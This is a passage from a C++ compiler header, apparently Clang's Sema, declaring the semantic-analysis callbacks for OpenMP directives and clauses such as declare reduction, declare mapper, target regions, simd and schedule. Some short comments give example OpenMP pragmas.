ArrayRef<Expr *> VarList);
/// Builds a new OMPThreadPrivateDecl and checks its correctness.
OMPThreadPrivateDecl *CheckOMPThreadPrivateDecl(SourceLocation Loc,
ArrayRef<Expr *> VarList);
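// Illustrative sketch (not from this header): the directive form behind
// ActOnOpenMPThreadprivateDirective; 'counter' is an example variable.
//
//   static int counter;
//   #pragma omp threadprivate(counter)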
/// Called on well-formed '#pragma omp allocate'.
DeclGroupPtrTy ActOnOpenMPAllocateDirective(SourceLocation Loc,
ArrayRef<Expr *> VarList,
ArrayRef<OMPClause *> Clauses,
DeclContext *Owner = nullptr);
/// Called on well-formed '#pragma omp requires'.
DeclGroupPtrTy ActOnOpenMPRequiresDirective(SourceLocation Loc,
ArrayRef<OMPClause *> ClauseList);
/// Check restrictions on the 'requires' directive.
OMPRequiresDecl *CheckOMPRequiresDecl(SourceLocation Loc,
ArrayRef<OMPClause *> Clauses);
/// Check if the specified type is allowed to be used in 'omp declare
/// reduction' construct.
QualType ActOnOpenMPDeclareReductionType(SourceLocation TyLoc,
TypeResult ParsedType);
/// Called on start of '#pragma omp declare reduction'.
DeclGroupPtrTy ActOnOpenMPDeclareReductionDirectiveStart(
Scope *S, DeclContext *DC, DeclarationName Name,
ArrayRef<std::pair<QualType, SourceLocation>> ReductionTypes,
AccessSpecifier AS, Decl *PrevDeclInScope = nullptr);
/// Initialize declare reduction construct initializer.
void ActOnOpenMPDeclareReductionCombinerStart(Scope *S, Decl *D);
/// Finish current declare reduction construct initializer.
void ActOnOpenMPDeclareReductionCombinerEnd(Decl *D, Expr *Combiner);
/// Initialize declare reduction construct initializer.
/// \return omp_priv variable.
VarDecl *ActOnOpenMPDeclareReductionInitializerStart(Scope *S, Decl *D);
/// Finish current declare reduction construct initializer.
void ActOnOpenMPDeclareReductionInitializerEnd(Decl *D, Expr *Initializer,
VarDecl *OmpPrivParm);
/// Called at the end of '#pragma omp declare reduction'.
DeclGroupPtrTy ActOnOpenMPDeclareReductionDirectiveEnd(
Scope *S, DeclGroupPtrTy DeclReductions, bool IsValid);
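// Illustrative sketch (not from this header): a user-defined reduction whose
// pieces map onto the Start/Combiner/Initializer/End callbacks above;
// 'merge' is an example reduction identifier.
//
//   #pragma omp declare reduction(merge : int : omp_out += omp_in) initializer(omp_priv = 0)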
/// Check variable declaration in 'omp declare mapper' construct.
TypeResult ActOnOpenMPDeclareMapperVarDecl(Scope *S, Declarator &D);
/// Check if the specified type is allowed to be used in 'omp declare
/// mapper' construct.
QualType ActOnOpenMPDeclareMapperType(SourceLocation TyLoc,
TypeResult ParsedType);
/// Called on start of '#pragma omp declare mapper'.
OMPDeclareMapperDecl *ActOnOpenMPDeclareMapperDirectiveStart(
Scope *S, DeclContext *DC, DeclarationName Name, QualType MapperType,
SourceLocation StartLoc, DeclarationName VN, AccessSpecifier AS,
Decl *PrevDeclInScope = nullptr);
/// Build the mapper variable of '#pragma omp declare mapper'.
void ActOnOpenMPDeclareMapperDirectiveVarDecl(OMPDeclareMapperDecl *DMD,
Scope *S, QualType MapperType,
SourceLocation StartLoc,
DeclarationName VN);
/// Called at the end of '#pragma omp declare mapper'.
DeclGroupPtrTy
ActOnOpenMPDeclareMapperDirectiveEnd(OMPDeclareMapperDecl *D, Scope *S,
ArrayRef<OMPClause *> ClauseList);
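// Illustrative sketch (not from this header): a user-defined mapper whose
// parsing flows through the DeclareMapper callbacks above; 'id' and struct
// 'vec' are example names.
//
//   struct vec { int len; double *data; };
//   #pragma omp declare mapper(id : struct vec v) map(v.len, v.data[0:v.len])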
/// Called at the start of a target region, i.e. '\#pragma omp declare target'.
bool ActOnStartOpenMPDeclareTargetDirective(SourceLocation Loc);
/// Called at the end of a target region, i.e. '\#pragma omp end declare target'.
void ActOnFinishOpenMPDeclareTargetDirective();
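// Illustrative sketch (not from this header): the region delimited by the
// two callbacks above; DeclareTargetNestingLevel is positive between them.
//
//   #pragma omp declare target
//   int device_tbl[64];   // made available in the device data environment
//   #pragma omp end declare target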
/// Searches for the provided declaration name for OpenMP declare target
/// directive.
NamedDecl *
lookupOpenMPDeclareTargetName(Scope *CurScope, CXXScopeSpec &ScopeSpec,
const DeclarationNameInfo &Id,
NamedDeclSetType &SameDirectiveDecls);
/// Called on correct id-expression from the '#pragma omp declare target'.
void ActOnOpenMPDeclareTargetName(NamedDecl *ND, SourceLocation Loc,
OMPDeclareTargetDeclAttr::MapTypeTy MT,
OMPDeclareTargetDeclAttr::DevTypeTy DT);
/// Check declaration inside target region.
void
checkDeclIsAllowedInOpenMPTarget(Expr *E, Decl *D,
SourceLocation IdLoc = SourceLocation());
/// Finishes analysis of the deferred function calls that may be declared as
/// host/nohost during device/host compilation.
void finalizeOpenMPDelayedAnalysis(const FunctionDecl *Caller,
const FunctionDecl *Callee,
SourceLocation Loc);
/// Return true inside OpenMP declare target region.
bool isInOpenMPDeclareTargetContext() const {
return DeclareTargetNestingLevel > 0;
}
/// Return true inside OpenMP target region.
bool isInOpenMPTargetExecutionDirective() const;
/// Return the number of captured regions created for an OpenMP directive.
static int getOpenMPCaptureLevels(OpenMPDirectiveKind Kind);
/// Initialization of captured region for OpenMP region.
void ActOnOpenMPRegionStart(OpenMPDirectiveKind DKind, Scope *CurScope);
/// End of OpenMP region.
///
/// \param S Statement associated with the current OpenMP region.
/// \param Clauses List of clauses for the current OpenMP region.
///
/// \returns Statement for finished OpenMP region.
StmtResult ActOnOpenMPRegionEnd(StmtResult S, ArrayRef<OMPClause *> Clauses);
StmtResult ActOnOpenMPExecutableDirective(
OpenMPDirectiveKind Kind, const DeclarationNameInfo &DirName,
OpenMPDirectiveKind CancelRegion, ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc, SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPParallelDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
using VarsWithInheritedDSAType =
llvm::SmallDenseMap<const ValueDecl *, const Expr *, 4>;
/// Called on well-formed '\#pragma omp simd' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp for' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPForDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp for simd' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPForSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp sections' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPSectionsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp section' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPSectionDirective(Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp single' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPSingleDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp master' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPMasterDirective(Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp critical' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPCriticalDirective(const DeclarationNameInfo &DirName,
ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel for' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel for simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp parallel sections' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelSectionsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp task' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTaskDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskyield'.
StmtResult ActOnOpenMPTaskyieldDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp barrier'.
StmtResult ActOnOpenMPBarrierDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskwait'.
StmtResult ActOnOpenMPTaskwaitDirective(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp taskgroup'.
StmtResult ActOnOpenMPTaskgroupDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp flush'.
StmtResult ActOnOpenMPFlushDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp depobj'.
StmtResult ActOnOpenMPDepobjDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp scan'.
StmtResult ActOnOpenMPScanDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp ordered' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPOrderedDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp atomic' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPAtomicDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTargetDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target data' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTargetDataDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target enter data' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetEnterDataDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp target exit data' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetExitDataDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp target parallel' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target parallel for' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTeamsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp cancellation point'.
StmtResult
ActOnOpenMPCancellationPointDirective(SourceLocation StartLoc,
SourceLocation EndLoc,
OpenMPDirectiveKind CancelRegion);
/// Called on well-formed '\#pragma omp cancel'.
StmtResult ActOnOpenMPCancelDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
OpenMPDirectiveKind CancelRegion);
/// Called on well-formed '\#pragma omp taskloop' after parsing of the
/// associated statement.
StmtResult
ActOnOpenMPTaskLoopDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp taskloop simd' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp master taskloop' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPMasterTaskLoopDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp master taskloop simd' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPMasterTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master taskloop' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterTaskLoopDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp parallel master taskloop simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPParallelMasterTaskLoopSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute' after parsing
/// of the associated statement.
StmtResult
ActOnOpenMPDistributeDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target update'.
StmtResult ActOnOpenMPTargetUpdateDirective(ArrayRef<OMPClause *> Clauses,
SourceLocation StartLoc,
SourceLocation EndLoc,
Stmt *AStmt);
/// Called on well-formed '\#pragma omp distribute parallel for' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute parallel for simd'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp distribute simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target parallel for simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target simd' after parsing of
/// the associated statement.
StmtResult
ActOnOpenMPTargetSimdDirective(ArrayRef<OMPClause *> Clauses, Stmt *AStmt,
SourceLocation StartLoc, SourceLocation EndLoc,
VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute' after parsing of
/// the associated statement.
StmtResult ActOnOpenMPTeamsDistributeDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute simd' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute parallel for simd'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp teams distribute parallel for'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTeamsDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams' after parsing of the
/// associated statement.
StmtResult ActOnOpenMPTargetTeamsDirective(ArrayRef<OMPClause *> Clauses,
Stmt *AStmt,
SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed '\#pragma omp target teams distribute' after parsing
/// of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute parallel for'
/// after parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeParallelForDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute parallel for
/// simd' after parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeParallelForSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Called on well-formed '\#pragma omp target teams distribute simd' after
/// parsing of the associated statement.
StmtResult ActOnOpenMPTargetTeamsDistributeSimdDirective(
ArrayRef<OMPClause *> Clauses, Stmt *AStmt, SourceLocation StartLoc,
SourceLocation EndLoc, VarsWithInheritedDSAType &VarsWithImplicitDSA);
/// Checks correctness of linear modifiers.
bool CheckOpenMPLinearModifier(OpenMPLinearClauseKind LinKind,
SourceLocation LinLoc);
/// Checks that the specified declaration matches requirements for the linear
/// decls.
bool CheckOpenMPLinearDecl(const ValueDecl *D, SourceLocation ELoc,
OpenMPLinearClauseKind LinKind, QualType Type,
bool IsDeclareSimd = false);
/// Called on well-formed '\#pragma omp declare simd' after parsing of
/// the associated method/function.
DeclGroupPtrTy ActOnOpenMPDeclareSimdDirective(
DeclGroupPtrTy DG, OMPDeclareSimdDeclAttr::BranchStateTy BS,
Expr *Simdlen, ArrayRef<Expr *> Uniforms, ArrayRef<Expr *> Aligneds,
ArrayRef<Expr *> Alignments, ArrayRef<Expr *> Linears,
ArrayRef<unsigned> LinModifiers, ArrayRef<Expr *> Steps, SourceRange SR);
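// Illustrative sketch (not from this header): a declare simd annotation
// whose clauses correspond to the Simdlen/Uniforms/Aligneds/Linears
// arguments above; the clause values are examples.
//
//   #pragma omp declare simd simdlen(8) uniform(a) linear(i : 1) aligned(a : 32)
//   float axpy(float *a, int i, float x);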
/// Checks '\#pragma omp declare variant' variant function and original
/// functions after parsing of the associated method/function.
/// \param DG Function declaration to which the declare variant directive is
/// applied.
/// \param VariantRef Expression that references the variant function, which
/// must be used instead of the original one, specified in \p DG.
/// \param TI The trait info object representing the match clause.
/// \returns None if the original function and the variant function are not
/// compatible with the pragma; otherwise, a pair of the original function
/// and the variant ref expression.
Optional<std::pair<FunctionDecl *, Expr *>>
checkOpenMPDeclareVariantFunction(DeclGroupPtrTy DG, Expr *VariantRef,
OMPTraitInfo &TI, SourceRange SR);
/// Called on well-formed '\#pragma omp declare variant' after parsing of
/// the associated method/function.
/// \param FD Function declaration to which the declare variant directive is
/// applied.
/// \param VariantRef Expression that references the variant function, which
/// must be used instead of the original one, specified in \p FD.
/// \param TI The context traits associated with the function variant.
void ActOnOpenMPDeclareVariantDirective(FunctionDecl *FD, Expr *VariantRef,
OMPTraitInfo &TI, SourceRange SR);
OMPClause *ActOnOpenMPSingleExprClause(OpenMPClauseKind Kind,
Expr *Expr,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'allocator' clause.
OMPClause *ActOnOpenMPAllocatorClause(Expr *Allocator,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'if' clause.
OMPClause *ActOnOpenMPIfClause(OpenMPDirectiveKind NameModifier,
Expr *Condition, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation NameModifierLoc,
SourceLocation ColonLoc,
SourceLocation EndLoc);
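// Illustrative sketch (not from this header): an 'if' clause with a
// directive name modifier, matching the NameModifier/Condition parameters
// above; 'n > 1024' is an example condition.
//
//   #pragma omp target parallel if(target : n > 1024)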
/// Called on well-formed 'final' clause.
OMPClause *ActOnOpenMPFinalClause(Expr *Condition, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'num_threads' clause.
OMPClause *ActOnOpenMPNumThreadsClause(Expr *NumThreads,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'safelen' clause.
OMPClause *ActOnOpenMPSafelenClause(Expr *Length,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'simdlen' clause.
OMPClause *ActOnOpenMPSimdlenClause(Expr *Length, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'collapse' clause.
OMPClause *ActOnOpenMPCollapseClause(Expr *NumForLoops,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'ordered' clause.
OMPClause *
ActOnOpenMPOrderedClause(SourceLocation StartLoc, SourceLocation EndLoc,
SourceLocation LParenLoc = SourceLocation(),
Expr *NumForLoops = nullptr);
/// Called on well-formed 'grainsize' clause.
OMPClause *ActOnOpenMPGrainsizeClause(Expr *Size, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'num_tasks' clause.
OMPClause *ActOnOpenMPNumTasksClause(Expr *NumTasks, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'hint' clause.
OMPClause *ActOnOpenMPHintClause(Expr *Hint, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'detach' clause.
OMPClause *ActOnOpenMPDetachClause(Expr *Evt, SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
OMPClause *ActOnOpenMPSimpleClause(OpenMPClauseKind Kind,
unsigned Argument,
SourceLocation ArgumentLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'default' clause.
OMPClause *ActOnOpenMPDefaultClause(llvm::omp::DefaultKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'proc_bind' clause.
OMPClause *ActOnOpenMPProcBindClause(llvm::omp::ProcBindKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'order' clause.
OMPClause *ActOnOpenMPOrderClause(OpenMPOrderClauseKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
/// Called on well-formed 'update' clause.
OMPClause *ActOnOpenMPUpdateClause(OpenMPDependClauseKind Kind,
SourceLocation KindLoc,
SourceLocation StartLoc,
SourceLocation LParenLoc,
SourceLocation EndLoc);
OMPClause *ActOnOpenMPSingleExprWithArgClause(
OpenMPClauseKind Kind, ArrayRef<unsigned> Arguments, Expr *Expr,
SourceLocation StartLoc, SourceLocation LParenLoc,
ArrayRef<SourceLocation> ArgumentsLoc, SourceLocation DelimLoc,
SourceLocation EndLoc);
/// Called on well-formed 'schedule' clause.
OMPClause *ActOnOpenMPScheduleClause(
OpenMPScheduleClauseModifier M1, OpenMPScheduleClauseModifier M2,
OpenMPScheduleClauseKind Kind, Expr *ChunkSize, SourceLocation StartLoc,
SourceLocation LParenLoc, SourceLocation M1Loc, SourceLocation M2Loc,
SourceLocation KindLoc, SourceLocation CommaLoc, SourceLocation EndLoc);
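// Illustrative sketch (not from this header): a schedule clause with a
// modifier, mapping onto the M1/Kind/ChunkSize parameters above; the chunk
// size 4 is an example value.
//
//   #pragma omp for schedule(monotonic : dynamic, 4)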
OMPClause *ActOnOpenMPClause(OpenMPClauseKind Kind, SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'nowait' clause.
OMPClause *ActOnOpenMPNowaitClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'untied' clause.
OMPClause *ActOnOpenMPUntiedClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'mergeable' clause.
OMPClause *ActOnOpenMPMergeableClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'read' clause.
OMPClause *ActOnOpenMPReadClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'write' clause.
OMPClause *ActOnOpenMPWriteClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'update' clause.
OMPClause *ActOnOpenMPUpdateClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'capture' clause.
OMPClause *ActOnOpenMPCaptureClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'seq_cst' clause.
OMPClause *ActOnOpenMPSeqCstClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'acq_rel' clause.
OMPClause *ActOnOpenMPAcqRelClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'acquire' clause.
OMPClause *ActOnOpenMPAcquireClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'release' clause.
OMPClause *ActOnOpenMPReleaseClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'relaxed' clause.
OMPClause *ActOnOpenMPRelaxedClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'destroy' clause.
OMPClause *ActOnOpenMPDestroyClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'threads' clause.
OMPClause *ActOnOpenMPThreadsClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'simd' clause.
OMPClause *ActOnOpenMPSIMDClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'nogroup' clause.
OMPClause *ActOnOpenMPNogroupClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'unified_address' clause.
OMPClause *ActOnOpenMPUnifiedAddressClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'unified_shared_memory' clause.
OMPClause *ActOnOpenMPUnifiedSharedMemoryClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'reverse_offload' clause.
OMPClause *ActOnOpenMPReverseOffloadClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'dynamic_allocators' clause.
OMPClause *ActOnOpenMPDynamicAllocatorsClause(SourceLocation StartLoc,
SourceLocation EndLoc);
/// Called on well-formed 'atomic_default_mem_order' clause.
OMPClause *ActOnOpenMPAtomicDefaultMemOrderClause(
OpenMPAtomicDefaultMemOrderClauseKind Kind, SourceLocation KindLoc,
SourceLocation StartLoc, SourceLocation LParenLoc, SourceLocation EndLoc);
OMPClause *ActOnOpenMPVarListClause(
OpenMPClauseKind Kind, ArrayRef<Expr *> Vars, Expr *DepModOrTailExpr,
const OMPVarListLocTy &Locs, SourceLocation ColonLoc,
CXXScopeSpec &ReductionOrMapperIdScopeSpec,
DeclarationNameInfo &ReductionOrMapperId, int ExtraModifier,
ArrayRef<OpenMPMapModifierKind> MapTypeModifiers,
ArrayRef<SourceLocation> MapTypeModifiersLoc, bool IsMapTypeImplicit,
SourceLocation ExtraModifierLoc);
/// Called on well-formed 'inclusive' clause.
OMPClause *ActOnOpenMPInclusiveClause(ArrayRef<Expr *> VarList,
SourceLocation StartLoc,
SourceLocation LParenLoc,
